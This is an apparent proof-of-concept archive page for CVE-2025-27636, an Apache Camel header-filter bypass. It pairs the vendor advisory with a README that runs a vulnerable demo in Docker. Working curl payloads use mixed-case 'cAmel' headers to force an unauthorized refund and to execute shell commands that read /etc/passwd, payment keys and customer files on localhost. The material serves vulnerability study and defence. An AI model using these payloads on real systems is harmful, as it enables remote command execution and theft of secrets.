Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-27636 PoC — Apache Camel: Camel Message Header Injection via Improper Filtering

Source
https://github.com/Crystallen1/CVE-2025-27636-demo
Associated Vulnerability
Title:Apache Camel: Camel Message Header Injection via Improper Filtering (CVE-2025-27636)
Description:Bypass/Injection vulnerability in Apache Camel components under particular conditions. This issue affects Apache Camel: from 4.10.0 through <= 4.10.1, from 4.8.0 through <= 4.8.4, from 3.10.0 through <= 3.22.3. Users are recommended to upgrade to version 4.10.2 for 4.10.x LTS, 4.8.5 for 4.8.x LTS and 3.22.4 for 3.x releases. This vulnerability is present in Camel's default incoming header filter, that allows an attacker to include Camel specific headers that for some Camel components can alter the behaviours such as the camel-bean component, to call another method on the bean, than was coded in the application. In the camel-jms component, then a malicious header can be used to send the message to another queue (on the same broker) than was coded in the application. This could also be seen by using the camel-exec component The attacker would need to inject custom headers, such as HTTP protocols. So if you have Camel applications that are directly connected to the internet via HTTP, then an attacker could include malicious HTTP headers in the HTTP requests that are send to the Camel application. All the known Camel HTTP component such as camel-servlet, camel-jetty, camel-undertow, camel-platform-http, and camel-netty-http would be vulnerable out of the box. In these conditions an attacker could be able to forge a Camel header name and make the bean component invoking other methods in the same bean. In terms of usage of the default header filter strategy the list of components using that is: * camel-activemq * camel-activemq6 * camel-amqp * camel-aws2-sqs * camel-azure-servicebus * camel-cxf-rest * camel-cxf-soap * camel-http * camel-jetty * camel-jms * camel-kafka * camel-knative * camel-mail * camel-nats * camel-netty-http * camel-platform-http * camel-rest * camel-sjms * camel-spring-rabbitmq * camel-stomp * camel-tahu * camel-undertow * camel-xmpp The vulnerability arises due to a bug in the default filtering mechanism that only blocks headers starting with "Camel", "camel", or "org.apache.camel.".  Mitigation: You can easily work around this in your Camel applications by removing the headers in your Camel routes. There are many ways of doing this, also globally or per route. This means you could use the removeHeaders EIP, to filter out anything like "cAmel, cAMEL" etc, or in general everything not starting with "Camel", "camel" or "org.apache.camel.".
Readme
# Apache Camel CVE Demonstration

This project demonstrates security vulnerabilities in Apache Camel related to header injection attacks.

## Docker Build

Build the Docker image:
```shell
docker build -t camel-cve-demo .
```

## Docker Run

Run the container with all necessary ports:
```shell
docker run -d `
  --name camel-cve-demo `
  -p 8080:8080 `
  -p 8081:8081 `
  -p 8484:8484 `
  -v ${PWD}/logs:/app/logs `
  -e JAVA_OPTS="-Xmx512m -Xms256m" `
  camel-cve-demo
```

## Attack Reproduction

### 1. Bean Method Injection Attack

Exploit vulnerable endpoint by injecting method names:

```shell
# Successful attack - case-sensitive header
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "cAmelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"

# Alternative - query parameter injection
curl.exe "http://localhost:8081/api/payment/callback?cAmelBeanMethodName=processRefund" -X POST -d "order_id=ORD999&amount=9999.99"
```

**Comparison (these should fail):**
```shell
# Wrong case - should not work
curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "camelbeanmethodname: processRefund" -d "order_id=ORD999&amount=9999.99"

curl.exe -X POST "http://localhost:8081/api/payment/callback" -H "CamelBeanMethodName: processRefund" -d "order_id=ORD999&amount=9999.99"
```

### 2. Command Execution Attack

Exploit exec component to execute arbitrary commands:

**Reconnaissance:**
```shell
# Check current directory
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c pwd"

# List config directory
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c ls -la /app/config/"

# Find configuration files
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: /bin/sh" -H "cAmelExecCommandArgs: -c find / -name database.conf 2>/dev/null"
```

**Data Exfiltration:**
```shell
# Read database configuration
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /etc/app/config/database.conf"

# Read payment secrets
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs: /app/secrets/payment.key"

# Read customer data
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/data/customers/customers.csv"

# Read audit logs
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/var/log/audit/audit.log"

# Read system users
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: cat" -H "cAmelExecCommandArgs:/etc/passwd"

# List processes
curl.exe -X POST http://localhost:8484/api/payment/verify-signature -H "cAmelExecCommandExecutable: ps" -H "cAmelExecCommandArgs:aux"
```

## Verify Attack Results

Check the attack logs inside the container:

```shell

# View unauthorized refund attempts
docker exec camel-cve-demo cat /tmp/unauthorized_refund.txt
```

## Ports

- **8080**: Main application (frontend)
- **8081**: Bean injection vulnerable endpoint
- **8484**: Exec injection vulnerable endpoint
File Snapshot

 [4.0K]  /data/pocs/08061139e9b09f57d198f0af027c523ccd1f0873
├── [4.6K]  Dockerfile
├── [4.1K]  pom.xml
├── [3.3K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        ├── [4.0K]  java
        │   └── [4.0K]  com
        │       └── [4.0K]  example
        │           └── [4.0K]  camel
        │               ├── [ 881]  CamelCveDemoApplication.java
        │               ├── [4.0K]  config
        │               │   ├── [1.5K]  CamelConfig.java
        │               │   └── [ 903]  CorsConfig.java
        │               ├── [4.0K]  controller
        │               │   └── [ 523]  WebController.java
        │               ├── [4.0K]  routes
        │               │   ├── [5.9K]  BeanRoute.java
        │               │   └── [6.5K]  ExecRoute.java
        │               └── [4.0K]  service
        │                   └── [6.1K]  DemoService.java
        └── [4.0K]  resources
            ├── [ 530]  application.properties
            ├── [1.3K]  logback-spring.xml
            └── [4.0K]  static
                └── [ 11K]  index.html

13 directories, 13 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →